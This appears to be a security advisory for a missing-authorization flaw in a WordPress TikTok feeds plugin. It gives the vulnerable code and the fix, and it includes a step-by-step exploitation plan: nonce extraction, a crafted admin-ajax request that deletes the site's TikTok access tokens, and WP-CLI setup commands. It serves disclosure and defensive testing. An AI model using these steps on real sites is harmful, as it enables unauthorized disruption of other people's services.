Feeds for TikTok – Display Video Feeds in Grid Layouts <= 1.0.24 - Missing Authorization
Description
The Feeds for TikTok – Display Video Feeds in Grid Layouts plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.0.24. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:NTechnical Details
What Changed in the Fix
Changes introduced in v1.0.25
Source Code
WordPress.org SVN# Exploitation Research Plan: CVE-2026-24520 (Feeds for TikTok - Missing Authorization) ## 1. Vulnerability Summary The **Feeds for TikTok – Display Video Feeds in Grid Layouts** plugin (versions <= 1.0.24) is vulnerable to missing authorization in its AJAX handlers. Specifically, the function `ttp…
Show full research plan
Exploitation Research Plan: CVE-2026-24520 (Feeds for TikTok - Missing Authorization)
1. Vulnerability Summary
The Feeds for TikTok – Display Video Feeds in Grid Layouts plugin (versions <= 1.0.24) is vulnerable to missing authorization in its AJAX handlers. Specifically, the function ttp_tiktok_clear in the TTP_TikTok\TTP_TikTok_Api class handles requests to clear the plugin's cache or disconnect the TikTok account without performing any capability checks (e.g., current_user_can('manage_options')).
While the handler verifies a WordPress nonce (ttp_fetch_data_nonce), this nonce is enqueued on frontend pages where the TikTok block is present, making it accessible to authenticated users (including Subscribers). An attacker can use this to perform a Denial of Service (DoS) by deleting the plugin's TikTok access tokens and feed data.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - AJAX Action:
ttp_tiktok_clear - Vulnerable Class:
TTP_TikTok\TTP_TikTok_Api - Vulnerable Method:
ttp_tiktok_clear(Line 161 ofincludes/api/TiktokAPI.php) - Authentication Required: Authenticated, Subscriber-level access (
wp_ajaxhook). - Payload Parameter:
action_type=unauthorized(to disconnect) oraction_type=clear_cache. - Preconditions:
- The plugin must be active.
- The attacker must have a valid Subscriber-level account.
- A valid nonce for
ttp_fetch_data_noncemust be obtained from the frontend.
3. Code Flow
- Registration: The plugin registers the AJAX handler in
includes/api/TiktokAPI.php:add_action('wp_ajax_ttp_tiktok_clear', [$this, 'ttp_tiktok_clear']); - Execution: When a request is made to
admin-ajax.php?action=ttp_tiktok_clear:ttp_tiktok_clear()is called.wp_verify_nonce(sanitize_text_field($_GET['nonce']), 'ttp_fetch_data_nonce')is checked (Line 163).- Missing: There is no call to
current_user_can().
- Sink: Depending on
action_type:- If
action_type === 'unauthorized':foreach ($this->transient as $transient) { delete_transient($transient); // Deletes ttp_tiktok_access_token, etc. } - This effectively disconnects the site from TikTok.
- If
4. Nonce Acquisition Strategy
The nonce is localized in the enqueueTiktokAssets function in index.php:
wp_localize_script('ttp-fancyApp', 'ttpData', [
'ajaxUrl' => admin_url('admin-ajax.php'),
'nonce' => wp_create_nonce('ttp_fetch_data_nonce'),
// ...
]);
The script ttp-fancyApp is registered and localized when block assets are enqueued.
Strategy:
- Identify the block name:
b-tiktok-feed/b-tiktok-feed(frombuild/block.json). - Create a post/page containing this block.
- As a Subscriber, navigate to that page.
- Extract the nonce from the
window.ttpDataobject usingbrowser_eval.
JS variable path: window.ttpData.nonce
5. Exploitation Strategy
Step 1: Obtain Nonce
- Login as Subscriber.
- Navigate to the page containing the TikTok feed.
- Execute:
browser_eval("window.ttpData.nonce").
Step 2: Trigger Account Disconnection (DoS)
Send an AJAX request to delete the access tokens:
- Method: GET (The code uses
$_GET['nonce']and$_GET['action_type']) - URL:
http://victims-wp.local/wp-admin/admin-ajax.php - Query Parameters:
action:ttp_tiktok_clearaction_type:unauthorizednonce:[EXTRACTED_NONCE]
Step 3: Verify Destruction
An attempt to fetch the feed data will now return empty results because ttp_tiktok_access_token is gone.
6. Test Data Setup
- Plugin Configuration: Install and activate
b-tiktok-feedversion 1.0.24. - Simulate Authentication: Use WP-CLI to manually set a dummy access token to represent an active connection:
wp transient set ttp_tiktok_access_token "mock_token_12345" 3600 wp transient set ttp_tiktok_authorized_data "mock_data" 3600 - Create Content: Create a page with the TikTok block to expose the nonce:
wp post create --post_type=page --post_status=publish --post_title="TikTok Feed" --post_content='<!-- wp:b-tiktok-feed/b-tiktok-feed /-->' - Create Attacker:
wp user create attacker attacker@example.com --role=subscriber --user_pass=password
7. Expected Results
- HTTP Response: 200 OK.
- Body:
{"videos":[],"user_info":[]}(encoded viawp_kses_post). - System State: The transients
ttp_tiktok_access_tokenandttp_tiktok_authorized_datawill be deleted from the database.
8. Verification Steps
After the exploit, check the transient state via WP-CLI:
wp transient get ttp_tiktok_access_token
# Expected: "Error: Transient with key "ttp_tiktok_access_token" not found."
9. Alternative Approaches
If action_type=unauthorized fails for any reason, try action_type=clear_cache.
While "Clear Cache" sounds benign, the ttp_tiktok_clear function calls getData() after clearing the cache. If an attacker can manipulate parameters like videoCacheTime or profileCacheTime (which are also taken from $_GET), they might be able to influence transient durations, although the primary impact remains the unauthorized invocation of the clearing logic itself.
Summary
The Feeds for TikTok plugin for WordPress is vulnerable to unauthorized access due to a missing capability check in its `ttp_tiktok_clear` AJAX handler. This allows authenticated attackers, such as subscribers, to clear the plugin's cache or disconnect the TikTok account by deleting the stored access tokens.
Vulnerable Code
// includes/api/TiktokAPI.php line 42 add_action('wp_ajax_ttp_tiktok_clear', [$this, 'ttp_tiktok_clear']); // includes/api/TiktokAPI.php line 161 public function ttp_tiktok_clear() { if (!wp_verify_nonce(sanitize_text_field($_GET['nonce']), 'ttp_fetch_data_nonce')) { echo wp_kses_post(wp_json_encode(['invalid nonce'])); wp_die(); } $action = sanitize_text_field($_GET['action_type']) ?? 'clear_cache'; $max_count = sanitize_text_field($_GET['max_count']) ?? 20; $videoCacheTime = sanitize_text_field($_GET['videoCacheTime']) ?? false; $profileCacheTime = sanitize_text_field($_GET['profileCacheTime']) ?? false; $key = sanitize_text_field($_GET['key']) ?? false; $device = sanitize_text_field($_GET['device']) ?? 'mobile'; if ($action === 'clear_cache') { delete_transient($key . '_ttp_tiktok_videos_' . $device); delete_transient('ttp_tiktok_user_info'); echo wp_kses_post($this->getData($key, $max_count, false, $videoCacheTime, $profileCacheTime)); } if ($action === 'unauthorized') { foreach ($this->transient as $transient) { delete_transient($transient); } delete_transient($key . '_ttp_tiktok_videos_' . $device); echo wp_kses_post(wp_json_encode(['videos' => [], 'user_info' => []])); } wp_die(); }
Security Fix
@@ -165,6 +165,10 @@ wp_die(); } + if (!current_user_can('manage_options')) { + wp_die('Unauthorized'); + } + $action = sanitize_text_field($_GET['action_type']) ?? 'clear_cache'; $max_count = sanitize_text_field($_GET['max_count']) ?? 20; $videoCacheTime = sanitize_text_field($_GET['videoCacheTime']) ?? false;
Exploit Outline
1. Log in to the WordPress site as a user with Subscriber-level privileges. 2. Navigate to a public page or post where a TikTok feed block is rendered to locate the localized script data. 3. Extract the `ttp_fetch_data_nonce` from the global JavaScript object `window.ttpData.nonce`. 4. Construct an AJAX request to `/wp-admin/admin-ajax.php` using the extracted nonce. 5. Set the `action` parameter to `ttp_tiktok_clear` and the `action_type` parameter to `unauthorized`. 6. Send the request, which triggers the deletion of the `ttp_tiktok_access_token` transient, effectively disabling the site's TikTok integration.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.